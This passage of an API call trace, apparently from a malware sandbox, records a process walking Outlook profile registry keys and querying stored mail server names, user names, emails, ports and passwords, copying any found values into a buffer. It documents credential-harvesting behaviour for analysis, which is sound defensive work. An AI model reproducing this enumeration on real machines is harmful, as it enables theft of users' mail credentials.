(in: hKey=0x948, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.280] RegCloseKey (hKey=0x948) returned 0x0 [0249.280] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.280] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.280] RegCloseKey (hKey=0x948) returned 0x0 [0249.280] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.281] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.281] RegCloseKey (hKey=0x948) returned 0x0 [0249.281] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.281] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.281] RegCloseKey (hKey=0x948) returned 0x0 [0249.281] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x1c4de40 | out: phkResult=0x1c4de40*=0x948) returned 0x0 [0249.281] RegEnumKeyExA (in: hKey=0x948, dwIndex=0x0, lpName=0x1c4de50, lpcchName=0x1c4e678, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4e678, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.281] RegCloseKey (hKey=0x948) returned 0x0 [0249.281] LocalFree (hMem=0xd19a290) returned 0x0 [0249.281] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x1, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000002", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.281] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0249.281] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0xd19a470 [0249.281] wsprintfA (in: param_1=0xd19a470, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002") returned 97 [0249.281] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.281] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.281] RegCloseKey (hKey=0x948) returned 0x0 [0249.281] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.281] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x5) returned 0x0 [0249.281] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd196d00 [0249.281] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0xd196d00, lpcbData=0x1c4dca8*=0x5 | out: lpType=0x0, lpData=0xd196d00*=0x72, lpcbData=0x1c4dca8*=0x5) returned 0x0 [0249.281] RegCloseKey (hKey=0x948) returned 0x0 [0249.282] GetProcAddress (hModule=0x7ff976f80000, lpProcName="IsTextUnicode") returned 0x7ff976f96c80 [0249.282] IsTextUnicode (in: lpv=0xd196d00, iSize=5, lpiResult=0x0 | out: lpiResult=0x0) returned 0 [0249.282] lstrlenA (lpString="rgdr") returned 4 [0249.282] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x5ce1dd0 [0249.282] lstrcpyA (in: lpString1=0x5ce1dd0, lpString2="rgdr" | out: lpString1="rgdr") returned="rgdr" [0249.282] LocalFree (hMem=0xd196d00) returned 0x0 [0249.282] lstrlenA (lpString="SMTP Server") returned 11 [0249.282] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xd196a00 [0249.282] LocalReAlloc (hMem=0xd196a00, uBytes=0x17, uFlags=0x2) returned 0x442eb70 [0249.282] lstrlenA (lpString="rgdr") returned 4 [0249.282] LocalReAlloc (hMem=0x442eb70, uBytes=0x1b, uFlags=0x2) returned 0x5d30e40 [0249.282] LocalReAlloc (hMem=0x5d30e40, uBytes=0x1c, uFlags=0x2) returned 0x5d30e40 [0249.282] LocalFree (hMem=0x5ce1dd0) returned 0x0 [0249.282] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.282] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x4) returned 0x0 [0249.282] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x5ce1e70 [0249.282] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x5ce1e70, lpcbData=0x1c4dca8*=0x4 | out: lpType=0x0, lpData=0x5ce1e70*=0x66, lpcbData=0x1c4dca8*=0x4) returned 0x0 [0249.282] RegCloseKey (hKey=0x948) returned 0x0 [0249.282] IsTextUnicode (in: lpv=0x5ce1e70, iSize=4, lpiResult=0x0 | out: lpiResult=0x0) returned 0 [0249.282] lstrlenA (lpString="fgr") returned 3 [0249.282] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce20f0 [0249.282] lstrcpyA (in: lpString1=0x5ce20f0, lpString2="fgr" | out: lpString1="fgr") returned="fgr" [0249.282] LocalFree (hMem=0x5ce1e70) returned 0x0 [0249.282] lstrlenA (lpString="POP3 Server") returned 11 [0249.282] LocalReAlloc (hMem=0x5d30e40, uBytes=0x27, uFlags=0x2) returned 0x326d30 [0249.282] LocalReAlloc (hMem=0x326d30, uBytes=0x29, uFlags=0x2) returned 0x3f3550 [0249.283] lstrlenA (lpString="fgr") returned 3 [0249.283] LocalReAlloc (hMem=0x3f3550, uBytes=0x2c, uFlags=0x2) returned 0x3f3550 [0249.283] LocalReAlloc (hMem=0x3f3550, uBytes=0x2d, uFlags=0x2) returned 0x3f3550 [0249.283] LocalFree (hMem=0x5ce20f0) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.283] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.283] RegCloseKey (hKey=0x948) returned 0x0 [0249.283] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0xf) returned 0x0 [0249.284] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0xd196c80 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0xd196c80, lpcbData=0x1c4dca8*=0xf | out: lpType=0x0, lpData=0xd196c80*=0x6c, lpcbData=0x1c4dca8*=0xf) returned 0x0 [0249.284] RegCloseKey (hKey=0x948) returned 0x0 [0249.284] IsTextUnicode (in: lpv=0xd196c80, iSize=15, lpiResult=0x0 | out: lpiResult=0x0) returned 0 [0249.284] lstrlenA (lpString="lcfkj@kiekc.df") returned 14 [0249.284] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0xd196d00 [0249.284] lstrcpyA (in: lpString1=0xd196d00, lpString2="lcfkj@kiekc.df" | out: lpString1="lcfkj@kiekc.df") returned="lcfkj@kiekc.df" [0249.284] LocalFree (hMem=0xd196c80) returned 0x0 [0249.284] lstrlenA (lpString="Email") returned 5 [0249.284] LocalReAlloc (hMem=0x3f3550, uBytes=0x32, uFlags=0x2) returned 0x3697a0 [0249.284] LocalReAlloc (hMem=0x3697a0, uBytes=0x34, uFlags=0x2) returned 0x3f3550 [0249.284] lstrlenA (lpString="lcfkj@kiekc.df") returned 14 [0249.284] LocalReAlloc (hMem=0x3f3550, uBytes=0x42, uFlags=0x2) returned 0x442ed50 [0249.284] LocalReAlloc (hMem=0x442ed50, uBytes=0x43, uFlags=0x2) returned 0x3ecf90 [0249.284] LocalFree (hMem=0xd196d00) returned 0x0 [0249.284] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.284] RegCloseKey (hKey=0x948) returned 0x0 [0249.284] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.284] RegCloseKey (hKey=0x948) returned 0x0 [0249.284] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0xf) returned 0x0 [0249.284] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0xd196a00 [0249.284] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0xd196a00, lpcbData=0x1c4dca8*=0xf | out: lpType=0x0, lpData=0xd196a00*=0x6c, lpcbData=0x1c4dca8*=0xf) returned 0x0 [0249.284] RegCloseKey (hKey=0x948) returned 0x0 [0249.284] IsTextUnicode (in: lpv=0xd196a00, iSize=15, lpiResult=0x0 | out: lpiResult=0x0) returned 0 [0249.284] lstrlenA (lpString="lcfkj@kiekc.df") returned 14 [0249.284] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0xd196b20 [0249.284] lstrcpyA (in: lpString1=0xd196b20, lpString2="lcfkj@kiekc.df" | out: lpString1="lcfkj@kiekc.df") returned="lcfkj@kiekc.df" [0249.284] LocalFree (hMem=0xd196a00) returned 0x0 [0249.284] lstrlenA (lpString="POP3 User") returned 9 [0249.284] LocalReAlloc (hMem=0x3ecf90, uBytes=0x4c, uFlags=0x2) returned 0x5c6d330 [0249.284] LocalReAlloc (hMem=0x5c6d330, uBytes=0x4e, uFlags=0x2) returned 0x5c6d330 [0249.285] lstrlenA (lpString="lcfkj@kiekc.df") returned 14 [0249.285] LocalReAlloc (hMem=0x5c6d330, uBytes=0x5c, uFlags=0x2) returned 0xd211f80 [0249.285] LocalReAlloc (hMem=0xd211f80, uBytes=0x5d, uFlags=0x2) returned 0xd211f80 [0249.285] LocalFree (hMem=0xd196b20) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.285] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.285] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.285] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: phkResult=0x1c4dd08*=0x948) returned 0x0 [0249.286] RegQueryValueExA (in: hKey=0x948, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4dcf8, lpData=0x1c4dcf0, lpcbData=0x1c4dd00*=0x4 | out: lpType=0x1c4dcf8*=0x0, lpData=0x1c4dcf0*=0x0, lpcbData=0x1c4dd00*=0x4) returned 0x2 [0249.286] RegCloseKey (hKey=0x948) returned 0x0 [0249.286] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dd08 | out: 